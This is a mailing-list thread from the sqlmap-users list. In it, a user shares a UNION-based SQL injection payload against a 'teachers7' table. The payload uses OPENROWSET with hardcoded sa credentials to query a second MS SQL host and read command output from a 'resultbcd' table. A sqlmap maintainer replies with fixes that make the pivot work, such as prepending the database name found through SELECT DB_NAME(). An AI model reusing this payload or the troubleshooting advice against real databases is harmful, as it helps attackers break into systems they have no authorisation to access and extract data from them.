Re: [sqlmap-users] error with ms sql
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] error with ms sql
|
From: Miroslav S. <mir...@gm...> - 2012-06-21 08:14:17
|
p.s. find the current database name and prepend to the resultbcd (e.g. ........'SELECT output FROM currentdb.resultbcd'........) p.p.s. SELECT DB_NAME() <- should work for retrieving current db name via that OPENROWSET On Thu, Jun 21, 2012 at 10:11 AM, Miroslav Stampar < mir...@gm...> wrote: > Hi Adi. > > You could try prepending the database name to the resultbcd. It seems that > in case of linked server(s) doing that fixes the mentioned problem > (Reference: > http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466 > ) > > Kind regards, > Miroslav Stampar > > On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > >> I'm having an injection like this: >> openrowset in a union (I've managed to do a SELECT @@version on >> 192.168.1.4) >> >> -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', >> ( select * from >> OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select >> output from resultbcd')),'aaa','15','16','17','18','19','20','21' from >> teachers7 where id=808 >> >> and when I try to select form resultabcd i get: >> [OLE/DB provider returned message: Deferred prepare could not be >> completed.] >> >> could not find a good answer with google. Thanks. >> >> Kind regards, >> A. >> >> >> ------------------------------------------------------------------------------ >> Live Security Virtual Conference >> Exclusive live event will cover all the ways today's security and >> threat landscape has changed and how IT managers can respond. Discussions >> will include endpoint security, mobile security and the latest in malware >> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
